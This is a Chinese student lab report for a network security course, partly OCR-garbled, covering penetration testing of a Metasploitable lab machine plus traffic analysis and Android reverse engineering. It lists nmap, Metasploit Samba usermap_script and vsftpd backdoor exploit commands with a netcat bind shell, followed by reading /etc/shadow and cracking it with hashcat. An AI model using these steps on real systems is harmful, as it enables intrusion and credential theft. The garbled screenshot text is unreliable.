课程实验报告.docx

上传人:p** 文档编号:96685 上传时间:2022-12-21 格式:DOCX 页数:10 大小:152.55KB
下载 相关 举报
课程实验报告.docx_第1页
第1页 / 共10页
课程实验报告.docx_第2页
第2页 / 共10页
课程实验报告.docx_第3页
第3页 / 共10页
课程实验报告.docx_第4页
第4页 / 共10页
课程实验报告.docx_第5页
第5页 / 共10页
课程实验报告.docx_第6页
第6页 / 共10页
课程实验报告.docx_第7页
第7页 / 共10页
课程实验报告.docx_第8页
第8页 / 共10页
课程实验报告.docx_第9页
第9页 / 共10页
课程实验报告.docx_第10页
第10页 / 共10页
亲,该文档总共10页,全部预览完了,如果喜欢就下载吧!
资源描述

《课程实验报告.docx》由会员分享,可在线阅读,更多相关《课程实验报告.docx(10页珍藏版)》请在第壹文秘上搜索。

1、等中科技火浮课程实验报告课程名称:网络空间安全综合实践山专业班级:学号:姓名:报告日期:2021625一、实验过程中遇到的问题和解决方法1.1. 渗透测试和流量分析本次实验分为渗透测试和流量分析两个部分。1.1.1. 渗透测试渗透测试实验主要是熟练运用发现漏洞和利用漏洞的命令。首先进行端口扫描来发现漏洞:nmap-T4-sV-v192.168.206.131FileActionsEditViewHaPNotshown:977closedportsIPORTSERVICEVERSION21/Up“PVSftpd2.3.422/UpSShOpenSSH.7lDebian8d3.X-4.X(work

2、group:WORKGROUP)445/tCPnetbios-ssnSambasHd3.X-4.X(workgroup:WORKGROUP)512/tcp“0Cnetkit-rshrexecd513/tcploginOponBSOorSolarisHogind5Utcptcpwrjppd1099/tcpava-raiGNUCUsspathgriregistry1524/tCpblrdsheUNetasploitablerootshell2049/tCpnfs2-(RPCffieM3)2ltcpHPProFTPO1.3.133MtcpMySQl5.e.51a-3ubs:/nnap.orgsuti

3、t/.Nnapdone:1IPaddress(1hostup)scannedin12.29secondsTI从而发现SAMBAMS-RPCSHE1.1.命令注入漏洞。在执行漏洞攻击的过程中,我们先启动Metasploit,搜索有关samba漏洞的代码库:searchsamba然后使用USernIap_script代码,查看攻击载荷:useexploit/multi/samba/usermapscriptshowpayloads接着选择bindnetcat,即使用netcat工具在渗透攻击成功后执行shel1并通过netcat绑定在一个监听端口上:setpayloademd/unix/bindn

4、etcat在查看参数配置后,设置目标ip、Port等参数:showoptionssetRHOST192.168.206.1315msf5searchVSftPdMatchingModulesNameDisclosureDateRankCheckDescription0xploitunix/ftp/SBH.234.backdoor2011-07-03excellentNoVSFFPQv23.4BackdoorCoemandExecutionmsf5useexploit/unix/ftp/vsftpd_23showoptionsModuleoptions(exploitunixftpvsftpd_

5、234-backdoor):NameCurrentSettingRequiredDescriptionRHOSTSysThetargethost(s)vrangeCIORIdentifierlorhostsfilewithsyntax,file,RPORT21yesThetargetport(TCP)Payloadoptions(cmd/unix/interact):NameCurrentSettingRequiredDescriptionExploittarget:IdNane0AutOMticElfSexploit()setRHOST192.168.206.131RHOST=192168.

6、2G6.13】执行攻击exploit,输入vimetcshadow即获得shadow文件,之后使用hashcat跑出密码即得1.1.2.流量分析在流量分析实验中,主要问题在于如何找到流量包中的原始数据信息。采取的方法是对流量包进行过滤,通过=6200以及tcportcp-data对ftp和ftp-data包进行过滤:甥3:SJ:S:Ig:SJ:SM:7akc:$rC-2.2.2.2.2.2.2.2.2.2.2.2.2. 4:4C&X.) 密器匿匿也捻蠹M!s第&雳 讪曲瞄掾Is:M最温瓯型需!Mll.fCV-*no 22d 7.1.4)ns gt p: u PC I1: 1 SMltcaiM

7、to Bury Mt QWTPgg: 22 (r*fT 2.1.4) sc acwmrP3* *9*ciy th f*M* 19r *xc*m1.KtCWU43(M:M:2T:4:X:4)然后跟踪tcp流,获得原始数据后将数据保存。接着打开保存的tgz文件,发现passwd文件和shadow文件,从而根据文件中的数据进行破解。1.2.逆向分析本次逆向分析实验的整体难度相对较大,工作量也相对较多。这部分的实验的主要内容为流量分析、函数调用栈动态跟踪、函数参数动态跟踪和二进制代码分析。1.2.1.流量分析流量分析实验的主要问题在于借助Wireshark抓取Android模拟器中“同步助手”登录和同

8、步数据时的流量,分析同步流量的数据特征,并根据这些特征,获取报文的一些信息,例如密文长度信息等。采取的方式是用wireshark对同步信息的过程进行抓包,同步信息完成后停止抓包。设置过滤内容为dns,观察到的ip地址为113.96.237.110:aS-eq*iz.X0C3Jl4.fTlMSve*MIIMttM*t*llflctkX221.92101510.12.168.?202.114.1?1CKS77Stenderdqrc.X231.924421202.11A.0.13110.U.U8.83MS1Standardqeryresponsex93Anpssync.3g.M.cu加 “Mt=*.

9、M:U 6 wlr Htc)f M M* rjrt*r*l rMiFv.24S出,0NS* DKl k,lZ.59:Ig:自)IntbF Frcccol rU8 4, Wi l.12.l6t.t). DKi 1D.M.297.1.2M387ATa;口8:二:方14M: WMXM:86IG = 3 C 二 M追踪tcp流,并以16进值查看,得出数据加密类型是分组加密。1.2.2.函数调用栈动态跟踪函数调用栈动态跟踪实验的主要问题在于分析出PC端与模拟器端连接的端口是多少。使用AndrOidkiller打开要分析的文件得知包名为nt.pim找到并运行,得出nt.pim的调试端口为8605,DDMS

10、的接收信息端口为87006De5e OQNamtacom.tBrKnt/nobftqqA4 SF60488601CfrundroidJcyha18898602COmUndrdIdohQne157086034n(jrol4rocsscorv21808607C8MnrddSymmur15758608ConXandroid JaUnCbtr318678609CorrundEdfysnhigrrrdWdOMiSWr 20648610ConMndrOfdMy 如 kworm19698611conrndr0*dvbvvMbvwa.ftrc0 28018612Sadms28439658213377ceDUtw42SHWi tfm, dual clock)26502.700 2750 2.9002 JcMPcfTMdro),d4ry3d46928613systsmjxocftss14328614frundro(d4)ftspoo19168615CorrutarKen1.sscuredawnloadjervke76448616fttftotnobneqq77408617coxandro2d4ttihgs16308618(orYMfJrooreserv

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 高等教育 > 实验设计

copyright@ 2008-2023 1wenmi网站版权所有

经营许可证编号:宁ICP备2022001189号-1

本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。第壹文秘仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第壹文秘网,我们立即给予删除!